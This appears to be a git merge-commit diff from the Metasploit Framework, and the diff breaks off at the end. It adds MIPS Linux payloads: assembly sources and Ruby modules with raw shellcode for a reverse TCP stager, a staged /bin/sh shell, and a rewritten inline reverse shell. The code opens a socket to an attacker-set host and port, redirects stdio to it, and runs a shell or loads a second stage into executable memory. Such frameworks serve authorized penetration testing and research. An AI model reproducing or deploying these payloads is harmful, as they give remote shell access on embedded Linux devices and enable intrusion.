Merge branch 'upstream/master' into basic_adsi_support
commit
f3a13d89af
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
#
|
||||
# Name: stage_tcp_shell
|
||||
# Type: Stage
|
||||
# Qualities: Compatible with both mips little and big endian
|
||||
# Platforms: Linux
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# This payload duplicates stdio, stdin and stderr to a file descriptor,
|
||||
# stored on $s2, and executes /bin/sh.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stage_tcp_shell.o stage_tcp_shell.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stage_tcp_shell stage_tcp_shell.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stages/linux/mipsle/shell.rb
|
||||
# and:
|
||||
# modules/payloads/stages/linux/mipsbe/shell.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# dup2(sockfd, 2)
|
||||
# dup2(sockfd, 1)
|
||||
# dup2(sockfd, 0)
|
||||
# a0: oldfd (sockfd)
|
||||
# a1: newfd (2, 1, 0)
|
||||
# v0: syscall = __NR_dup2 (4063)
|
||||
li $s1, -3
|
||||
nor $s1, $s1, $zero
|
||||
add $a0, $s2, $zero
|
||||
dup2_loop:
|
||||
add $a1, $s1, $zero # dup2_loop
|
||||
li $v0, 4063 # sys_dup2
|
||||
syscall 0x40404
|
||||
li $s0, -1
|
||||
addi $s1, $s1, -1
|
||||
bne $s1, $s0, dup2_loop # <dup2_loop>
|
||||
|
||||
# execve("/bin/sh", ["/bin/sh"], NULL)
|
||||
# a0: filename "/bin/sh"
|
||||
# a1: argv ["/bin/sh", NULL]
|
||||
# a2: envp NULL
|
||||
# v0: syscall = __NR_dup2 (4011)
|
||||
li $t8, -1 # load t8 with -1
|
||||
getaddr: # getaddr trick from scut@team-teso.net
|
||||
bltzal $t8, getaddr # branch with $ra stored if t8 < 0
|
||||
slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
|
||||
addi $a0, $ra, 28 # $ra gets this address
|
||||
sw $a0, -8($sp)
|
||||
sw $zero, -4($sp)
|
||||
addi $a1, $sp, -8
|
||||
slti $a2, $zero,-1
|
||||
li $v0, 4011 # sys_execve
|
||||
syscall 0x40404
|
||||
|
||||
.string "/bin/sh"
|
||||
.set macro
|
||||
.set reorder
|
|
@ -0,0 +1,127 @@
|
|||
##
|
||||
#
|
||||
# Name: stager_sock_reverse
|
||||
# Type: Stager
|
||||
# Qualities: No Nulls out of the IP / Port data
|
||||
# Platforms: Linux MIPS Big Endian
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# Implementation of a MIPS BE Linux reverse TCP stager.
|
||||
#
|
||||
# File descriptor in $s2.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stager_sock_reverse.o stager_sock_reverse.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stager_sock_reverse stager_sock_reverse.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
# a0: domain = PF_INET (2)
|
||||
# a1: type = SOCK_STREAM (2)
|
||||
# a2: protocol = IPPROTO_IP (0)
|
||||
# v0: syscall = __NR_socket (4183)
|
||||
li $t7, -6
|
||||
nor $t7, $t7, $zero
|
||||
addi $a0, $t7, -3
|
||||
addi $a1, $t7, -3
|
||||
slti $a2, $zero, -1
|
||||
li $v0, 4183
|
||||
syscall 0x40404
|
||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||
|
||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||
# a0: sockfd
|
||||
# a1: addr = AF_INET (2)
|
||||
# a2: addrlen = 16
|
||||
# v0: syscall = __NR_connect (4170)
|
||||
lw $a0, -4($sp)
|
||||
li $t7, -3
|
||||
nor $t7, $t7, $zero
|
||||
sw $t7, -32($sp)
|
||||
lui $t6, 0x115c
|
||||
sw $t6, -28($sp)
|
||||
lui $t6, 0x7f00 # ip
|
||||
ori $t6, $t6, 0x0001 # ip
|
||||
sw $t6, -26($sp)
|
||||
addiu $a1, $sp, -30
|
||||
li $t4, -17
|
||||
nor $a2, $t4, $zero
|
||||
li $v0, 4170
|
||||
syscall 0x40404
|
||||
|
||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||
# a0: addr = -1
|
||||
# a1: lenght = 4096
|
||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||
# sp(16): fd = -1
|
||||
# sp(20): offset = 0
|
||||
# v0: syscall = __NR_mmap (4090)
|
||||
li $a0, -1
|
||||
li $a1, 4097
|
||||
addi $a1, $a1, -1
|
||||
li $t1, -8
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $a3, 2050
|
||||
li $t3, -22
|
||||
nor $t3, $t3, $zero
|
||||
add $t3, $sp, $t3
|
||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||
li $v0, 4090
|
||||
syscall 0x40404
|
||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||
|
||||
# read(sockfd, addr, 4096)
|
||||
# a0: sockfd
|
||||
# a1: addr
|
||||
# a2: len = 4096
|
||||
# v0: syscall = __NR_read (4003)
|
||||
lw $a0, -4($sp)
|
||||
lw $a1, -8($sp)
|
||||
li $a2, 4097
|
||||
addi $a2, $a2, -1
|
||||
li $v0, 4003
|
||||
syscall 0x40404
|
||||
|
||||
# cacheflush(addr, nbytes, DCACHE)
|
||||
# a0: addr
|
||||
# a1: nbytes
|
||||
# a2: cache = DCACHE (2)
|
||||
# v0: syscall = __NR_read (4147)
|
||||
lw $a0, -8($sp)
|
||||
add $a1, $v0, $zero
|
||||
li $t1, -3
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $v0, 4147
|
||||
syscall 0x40404
|
||||
|
||||
# jmp to the stage
|
||||
lw $s1, -8($sp)
|
||||
lw $s2, -4($sp)
|
||||
jalr $s1
|
||||
|
||||
.set macro
|
||||
.set reorder
|
|
@ -0,0 +1,127 @@
|
|||
##
|
||||
#
|
||||
# Name: stager_sock_reverse
|
||||
# Type: Stager
|
||||
# Qualities: No Nulls out of the IP / Port data
|
||||
# Platforms: Linux MIPS Little Endian
|
||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
||||
# License:
|
||||
#
|
||||
# This file is part of the Metasploit Exploit Framework
|
||||
# and is subject to the same licenses and copyrights as
|
||||
# the rest of this package.
|
||||
#
|
||||
# Description:
|
||||
#
|
||||
# Implementation of a MIPS LE Linux reverse TCP stager.
|
||||
#
|
||||
# File descriptor in $s2.
|
||||
#
|
||||
# Assemble and create a relocatable object with:
|
||||
# as -o stager_sock_reverse.o stager_sock_reverse.s
|
||||
#
|
||||
# Assemble, link and create an executable ELF with:
|
||||
# gcc -o stager_sock_reverse stager_sock_reverse.s
|
||||
#
|
||||
# The tool "tools/metasm_shell.rb" can be used to easily
|
||||
# generate the string to place on:
|
||||
# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
|
||||
##
|
||||
.text
|
||||
.align 2
|
||||
.globl main
|
||||
.set nomips16
|
||||
main:
|
||||
.set noreorder
|
||||
.set nomacro
|
||||
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
# a0: domain = PF_INET (2)
|
||||
# a1: type = SOCK_STREAM (2)
|
||||
# a2: protocol = IPPROTO_IP (0)
|
||||
# v0: syscall = __NR_socket (4183)
|
||||
li $t7, -6
|
||||
nor $t7, $t7, $zero
|
||||
addi $a0, $t7, -3
|
||||
addi $a1, $t7, -3
|
||||
slti $a2, $zero, -1
|
||||
li $v0, 4183
|
||||
syscall 0x40404
|
||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||
|
||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
||||
# a0: sockfd
|
||||
# a1: addr = AF_INET (2)
|
||||
# a2: addrlen = 16
|
||||
# v0: syscall = __NR_connect (4170)
|
||||
lw $a0, -4($sp)
|
||||
li $t7, -3
|
||||
nor $t7, $t7, $zero
|
||||
sw $t7, -30($sp)
|
||||
ori $t6, $zero, 0x5c11 # port
|
||||
sw $t6, -28($sp)
|
||||
lui $t6, 0x100 # ip
|
||||
ori $t6, $t6, 0x7f # ip
|
||||
sw $t6, -26($sp)
|
||||
addiu $a1, $sp, -30
|
||||
li $t4, -17
|
||||
nor $a2, $t4, $zero
|
||||
li $v0, 4170
|
||||
syscall 0x40404
|
||||
|
||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||
# a0: addr = -1
|
||||
# a1: lenght = 4096
|
||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||
# sp(16): fd = -1
|
||||
# sp(20): offset = 0
|
||||
# v0: syscall = __NR_mmap (4090)
|
||||
li $a0, -1
|
||||
li $a1, 4097
|
||||
addi $a1, $a1, -1
|
||||
li $t1, -8
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $a3, 2050
|
||||
li $t3, -22
|
||||
nor $t3, $t3, $zero
|
||||
add $t3, $sp, $t3
|
||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||
li $v0, 4090
|
||||
syscall 0x40404
|
||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||
|
||||
# read(sockfd, addr, 4096)
|
||||
# a0: sockfd
|
||||
# a1: addr
|
||||
# a2: len = 4096
|
||||
# v0: syscall = __NR_read (4003)
|
||||
lw $a0, -4($sp)
|
||||
lw $a1, -8($sp)
|
||||
li $a2, 4097
|
||||
addi $a2, $a2, -1
|
||||
li $v0, 4003
|
||||
syscall 0x40404
|
||||
|
||||
# cacheflush(addr, nbytes, DCACHE)
|
||||
# a0: addr
|
||||
# a1: nbytes
|
||||
# a2: cache = DCACHE (2)
|
||||
# v0: syscall = __NR_read (4147)
|
||||
lw $a0, -8($sp)
|
||||
add $a1, $v0, $zero
|
||||
li $t1, -3
|
||||
nor $t1, $t1, $0
|
||||
add $a2, $t1, $0
|
||||
li $v0, 4147
|
||||
syscall 0x40404
|
||||
|
||||
# jmp to the stage
|
||||
lw $s1, -8($sp)
|
||||
lw $s2, -4($sp) # sockfd saved on $s2
|
||||
jalr $s1
|
||||
|
||||
.set macro
|
||||
.set reorder
|
|
@ -3,9 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
|
||||
# + Few removals of unneccessary zero bytes by kost
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
@ -21,7 +18,11 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Reverse TCP Inline',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'Julien Tinnes',
|
||||
'Author' =>
|
||||
[
|
||||
'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
|
@ -47,74 +48,72 @@ module Metasploit3
|
|||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\xef\xff\x09\x24" + # li t1,-17
|
||||
"\xff\xff\x10\x05" + # bltzal t0,0x4
|
||||
"\x82\x82\x08\x28" + # slti t0,zero,-32126
|
||||
"\x27\x48\x20\x01" + # nor t1,t1,zero
|
||||
"\x21\xc8\x3f\x01" + # addu t9,t1,ra
|
||||
"\x48\x85\xb9\xaf" + # sw t9,-31416(sp)
|
||||
"\x48\x85\xb9\x23" + # addi t9,sp,-31416
|
||||
"\x00\x00\x1c\x3c" + # lui gp,0x0
|
||||
"\x00\x00\x9c\x27" + # addiu gp,gp,0
|
||||
"\x21\xe0\x99\x03" + # addu gp,gp,t9
|
||||
"\x00\x00\x89\x8f" + # lw t1,0(gp)
|
||||
"\xd8\xff\xbd\x27" + # addiu sp,sp,-40
|
||||
"\xe8\x00\x2a\x25" + # addiu t2,t1,232
|
||||
"\x04\x00\x47\x8d" + # lw a3,4(t2)
|
||||
"\xe8\x00\x28\x8d" + # lw t0,232(t1)
|
||||
host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901
|
||||
host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0
|
||||
"\x18\x00\xb9\x27" + # addiu t9,sp,24
|
||||
"\x02\x00\x06\x24" + # li a2,2
|
||||
port.pack("C2") + "\x05\x24" + # li a1,9746
|
||||
"\x08\x00\xa6\xa7" + # sh a2,8(sp)
|
||||
"\x0a\x00\xa5\xa7" + # sh a1,10(sp)
|
||||
"\x18\x00\xa8\xaf" + # sw t0,24(sp)
|
||||
"\x1c\x00\xa7\xaf" + # sw a3,28(sp)
|
||||
"\x0c\x00\xa3\xaf" + # sw v1,12(sp)
|
||||
"\x20\x00\xb9\xaf" + # sw t9,32(sp)
|
||||
"\x24\x00\xa0\xaf" + # sw zero,36(sp)
|
||||
"\x02\x00\x04\x24" + # li a0,2
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x57\x10\x02\x24" + # li v0,4183
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x18\x40\x00" + # move v1,v0
|
||||
"\xff\xff\x02\x24" + # li v0,-1
|
||||
"\x1a\x00\x62\x10" + # beq v1,v0,0xf4
|
||||
"\x01\x00\x04\x24" + # li a0,1
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x08\x00\xa5\x27" + # addiu a1,sp,8
|
||||
"\x10\x00\x06\x24" + # li a2,16
|
||||
"\x4a\x10\x02\x24" + # li v0,4170
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x0e\x00\x40\x14" + # bnez v0,0xe0
|
||||
"\x21\x28\x00\x00" + # move a1,zero
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x01\x00\x05\x24" + # li a1,1
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x21\x20\x20\x03" + # move a0,t9
|
||||
"\x20\x00\xa5\x27" + # addiu a1,sp,32
|
||||
"\xab\x0f\x02\x24" + # li v0,4011
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x21\x20\x00\x00" + # move a0,zero
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\x08\x00\xe0\x03" + # jr ra
|
||||
"\x28\x00\xbd\x27" + # addiu sp,sp,40
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x01\x01\x01" + # syscall
|
||||
"\xe5\xff\x00\x10" + # b 0x94
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
# sys_socket
|
||||
# a0: domain
|
||||
# a1: type
|
||||
# a2: protocol
|
||||
"\xfa\xff\x0f\x24" + # li t7,-6
|
||||
"\x27\x78\xe0\x01" + # nor t7,t7,zero
|
||||
"\xfd\xff\xe4\x21" + # addi a0,t7,-3
|
||||
"\xfd\xff\xe5\x21" + # addi a1,t7,-3
|
||||
"\xff\xff\x06\x28" + # slti a2,zero,-1
|
||||
"\x57\x10\x02\x24" + # li v0,4183 # sys_socket
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
|
||||
# sys_connect
|
||||
# a0: sockfd (stored on the stack)
|
||||
# a1: addr (data stored on the stack)
|
||||
# a2: addrlen
|
||||
"\xff\xff\xa2\xaf" + # sw v0,-1(sp)
|
||||
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
|
||||
"\xfd\xff\x0f\x34" + # li t7,0xfffd
|
||||
"\x27\x78\xe0\x01" + # nor t7,t7,zero
|
||||
"\xe2\xff\xaf\xaf" + # sw t7,-30(sp)
|
||||
port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f90
|
||||
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
|
||||
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
|
||||
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
|
||||
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
|
||||
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
|
||||
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
|
||||
"\xef\xff\x0c\x24" + # li t4,-17
|
||||
"\x27\x30\x80\x01" + # nor a2,t4,zero
|
||||
"\x4a\x10\x02\x24" + # li v0,4170 # sys_connect
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
|
||||
# sys_dup2
|
||||
# a0: oldfd (socket)
|
||||
# a1: newfd (0, 1, 2)
|
||||
"\xfd\xff\x11\x24" + # li s1,-3
|
||||
"\x27\x88\x20\x02" + # nor s1,s1,zero
|
||||
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
|
||||
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2
|
||||
"\x0c\x01\x01\x01" + # syscall 0x40404
|
||||
"\xff\xff\x10\x24" + # li s0,-1
|
||||
"\xff\xff\x31\x22" + # addi s1,s1,-1
|
||||
"\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>
|
||||
|
||||
# sys_execve
|
||||
# a0: filename (stored on the stack) "//bin/sh"
|
||||
# a1: argv "//bin/sh"
|
||||
# a2: envp (null)
|
||||
"\xff\xff\x06\x28" + # slti a2,zero,-1
|
||||
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
|
||||
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
|
||||
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
|
||||
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
|
||||
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
|
||||
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
|
||||
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
|
||||
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
|
||||
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
|
||||
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
|
||||
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
|
||||
"\xab\x0f\x02\x24" + # li v0,4011 # sys_execve
|
||||
"\x0c\x01\x01\x01" # syscall 0x40404
|
||||
|
||||
return super + shellcode
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -0,0 +1,56 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ [58, 62], 'ADDR16MSB' ],
|
||||
'LPORT' => [ 50, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
|
||||
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
|
||||
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
|
||||
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
|
||||
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
|
||||
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
|
||||
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
|
||||
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
|
||||
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
|
||||
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
|
||||
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
|
||||
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
|
||||
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
|
||||
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
|
||||
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
|
||||
"\xf8\x09"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,56 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ [60, 56], 'ADDR16MSB' ],
|
||||
'LPORT' => [ 48, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
|
||||
"\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
|
||||
"\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
|
||||
"\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
|
||||
"\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
|
||||
"\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
|
||||
"\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
|
||||
"\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
|
||||
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
|
||||
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
|
||||
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
|
||||
"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
|
||||
"\x20\x02"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,36 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell',
|
||||
'Description' => 'Spawn a command shell (staged)',
|
||||
'Author' => 'juan vazquez',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" +
|
||||
"\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" +
|
||||
"\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" +
|
||||
"\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" +
|
||||
"\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" +
|
||||
"\x0f\xab\x01\x01\x01\x0c\x2f\x62\x69\x6e\x2f\x73\x68\x00"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,36 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell',
|
||||
'Description' => 'Spawn a command shell (staged)',
|
||||
'Author' => 'juan vazquez',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" +
|
||||
"\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" +
|
||||
"\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" +
|
||||
"\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" +
|
||||
"\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" +
|
||||
"\x02\x24\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x00"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -3,7 +3,8 @@
|
|||
# $Id$
|
||||
#
|
||||
